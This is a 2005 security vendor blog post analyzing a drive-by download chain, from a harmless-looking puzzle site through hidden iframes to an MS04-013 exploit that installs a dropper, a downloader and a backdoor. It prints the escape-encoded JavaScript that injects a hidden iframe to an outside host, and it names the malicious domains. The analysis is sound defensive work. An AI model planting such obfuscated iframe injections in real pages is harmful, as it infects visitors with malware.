• Trend Micro
  • About TrendLabs Security Intelligence Blog
Search:
  • Home
  • Categories
    • Ransomware
    • Vulnerabilities
    • Exploits
    • Targeted Attacks
    • Deep Web
    • Mobile
    • Internet of Things
    • Malware
    • Bad Sites
    • Spam
    • Botnets
    • Social
    • Open source
Home   »   Bad Sites   »   A Mixed Threat Adventure

A Mixed Threat Adventure

  • Posted on:October 27, 2005 at 3:44 am
  • Posted in:Bad Sites
  • Author:
    Jhoevine Capicio (Threats Analyst)
0

Mixed threats are becoming more and more common nowadays. Most of the times, users don’t even know what hit them until it’s too late. Just visit a site, which REALLY looks like a legitimate one by the way, and presto – you have your instant adwares, spywares, backdoors, trojans or even worms roaming free and undetected in your system!

We have reported many of these examples of what we may call as Mixed Threat Adventures or mal-Adventures in the past, but here’s one current example that is still out there in the wild, so to speak!

This site, http: //www.freedailyjigsawpuzzles.com/, REALLY just looks like a normal website offering free jigsaw puzzles.




But by looking at the code of this would be “Normal Website”, I saw this – a javascript which is encoded using the escape command.

document.write(unescape(‘%3C%69%66%72%61%6D%65%20%73%72%63%3D
%22%68%74%74%70%3A%2F%2F%77%77%77%2E%70%66%6C%2D%65%6E%6C
%61%72%67%65%2E%63%6F%6D%22%20%77%69%64%74%68%3D%30%20%62
%6F%72%64%65%72%3D%30%20%68%65%69%67%68%74%3D%30%3E%3C%2F
%69%66%72%61%6D%65%3E’));


which when unescaped exploits an iframe to load another website
http://www.pfl-enlarge.com.

This website in turn loads another site, http://www.britroadsters.com, using again the iframe exploit.

The http://www.britroadsters.com site checks for the browser application. If the browser is “Microsoft Internet Explorer” then it loads the file enter.php and if it’s not it loads the file all.php. It doesn’tt really matter however since both these files actually just load another website using again an iframe exploit which will lead to
http://www.secretadvise.biz/news.html.

Hehe… In the words of my TL, this is just like following the bouncing ball of malware.

So in the site http://www.secretadvise.biz/news.html, which is reeeally an “evil” site, there is a javascript (encoded with again the escape command) which exploits the Microsoft HTML Help Vulnerability (MS04-013) and ultimately downloads and executes a file named
“Style.css”.

Here is an image of the decoded script from news.html.



Voila! The exploit code can now be seen… and a mysterous style.css file…

From website links, now we go to files downloaded

Don’t be fooled by the extension – Style.css is actually a chm file which drops an exe file named open.exe. There you now we’re getting somewhere!:) hehe.. But that’s not where it ends…

The file open.exe is also just a downloader and downloads a file from
http://www.secretadvise.biz/girl.bmp. And this “bmp” file is – hold your horses – a backdoor!

The files have been sent to the service team for signature generation and here’ss the reply. The files will be detected as such:

News.html (1,998 bytes) – JS_WONKA.B
Style.css (13,016 bytes) – CHM_DROPPER.CN
Open.exe (2,608 bytes) – TROJ_DLOADER.AJH
Girl.bmp (50,920 bytes) – BKDR_HAXDOOR.CT

So let us review, just by visiting a site, a seemingly normal and non-malicious site, the system will be infected with 4 malwares. Plus there’s the added bonus of having a malicious user hack in to your system because of BKDR_HAXDOOR.CT!

So for those Net-Surfers out there, just keep in mind what sites you go into. Plus of course it’s always a good thing to have your systems patched and your pattern files updated.:)

Learn how to protect Enterprises, Small Businesses, and Home Users from ransomware:
ENTERPRISE »
SMALL BUSINESS»
HOME»

Security Predictions for 2020

  • Cybersecurity in 2020 will be viewed through many lenses — from differing attacker motivations and cybercriminal arsenal to technological developments and global threat intelligence — only so defenders can keep up with the broad range of threats.
    Read our security predictions for 2020.

Business Process Compromise

  • Attackers are starting to invest in long-term operations that target specific processes enterprises rely on. They scout for vulnerable practices, susceptible systems and operational loopholes that they can leverage or abuse. To learn more, read our Security 101: Business Process Compromise.

Recent Posts

  • Our New Blog
  • How Unsecure gRPC Implementations Can Compromise APIs, Applications
  • XCSSET Mac Malware: Infects Xcode Projects, Performs UXSS Attack on Safari, Other Browsers, Leverages Zero-day Exploits
  • August Patch Tuesday Fixes Critical IE, Important Windows Vulnerabilities Exploited in the Wild
  • Water Nue Phishing Campaign Targets C-Suite’s Office 365 Accounts

Popular Posts

Sorry. No data so far.

Stay Updated

  • Home and Home Office
  • |
  • For Business
  • |
  • Security Intelligence
  • |
  • About Trend Micro
  • Asia Pacific Region (APAC): Australia / New Zealand, 中国, 日本, 대한민국, 台灣
  • Latin America Region (LAR): Brasil, México
  • North America Region (NABU): United States, Canada
  • Europe, Middle East, & Africa Region (EMEA): France, Deutschland / Österreich / Schweiz, Italia, Россия, España, United Kingdom / Ireland
  • Privacy Statement
  • Legal Policies
  • Copyright © Trend Micro Incorporated. All rights reserved.